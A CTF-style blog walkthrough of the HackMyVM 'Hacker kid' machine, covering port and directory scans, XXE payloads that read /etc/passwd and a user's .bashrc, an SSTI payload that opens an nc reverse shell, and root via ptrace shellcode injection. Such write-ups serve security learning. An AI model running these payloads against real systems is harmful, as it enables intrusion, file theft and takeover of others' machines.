Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Hacker kid: 1.0.1 Walkthrough

HackMyVm Hacker kid: 1.0.1 Walkthrough,719/

Very good machine, learn some new stuff.

Scan ports, port 53 is interesting.

 nmap -sV -sC -p-  -oN ports.log        
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,
 403,404,500 --wildcard   -o 80.log
 /images               (Status: 301) [Size: 317] [-->]
 /index.php            (Status: 200) [Size: 3597]                                    
 /css                  (Status: 301) [Size: 314] [-->]  
 /form.html            (Status: 200) [Size: 10219]                                  
 /app.html             (Status: 200) [Size: 8048]                                    
 /javascript           (Status: 301) [Size: 321] [-->]

Found hints in index.php source code.

 <div class="container py-5">
  TO DO: Use a GET parameter page_no  to view pages.

Fuzz index.php with page_no.

 ~ seq 1 100 > dic.txt
 ~ wfuzz -u ''    -w dic.txt --hh 3654
 000000021:   200        116 L    310 W      3849 Ch     "21"

Get more info with page_no=21.

 ~ curl ''
         <font color="red">
 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many such such home for me : hackers.blackhat.local<br>
 <font color="red">

Dig another domain name, write it into /etc/hosts.

 ~ dig @ hackers.blackhat.local                                                             ...
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600

Visit hackerkid.blackhat.local, use XXE (XML External Entity) Injection.

 ~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'file:///etc/passwd\'>
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

Read bachrc file with base64.

 ~ curl 'http://hackerkid.blackhat.local/process.php'     -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \'php://filter/convert.base64-encode/resource=/home/saket/.bashrc\'>]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!

Decode base64. Get password of port 9999, but should login with name "saket".

 #Setting Password for running python app

Login port 9999.


Input param "name", get output in webpage.


Enter shell code, get reverse shell through nc, then spawn a new full shell.

 {%import os%}{{os.system("nc 1234|/bin/bash|nc 2234")}}

Getcap enum.

 saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep


Download the POC and upload to server.


Choose a root process to be injected.

 saket@ubuntu:~$ ps aux|grep root
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start

Run the POC, then check port.

 saket@ubuntu:~$ python2.7 935
 python2.7 935
 Instruction Pointer: 0x7fd118b560daL
 Injecting Shellcode at: 0x7fd118b560daL
 Shellcode Injected!!
 Final Instruction Pointer: 0x7fd118b560dcL
 saket@ubuntu:~$ ss -tnlp
 ss -tnlp
 State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
 LISTEN    0         0           *                                ...

Connect port 5600 and get root shell.

 ~ nc 5600              
 uid=0(root) gid=0(root) groups=0(root)



Powered By Z-BlogPHP 1.7.1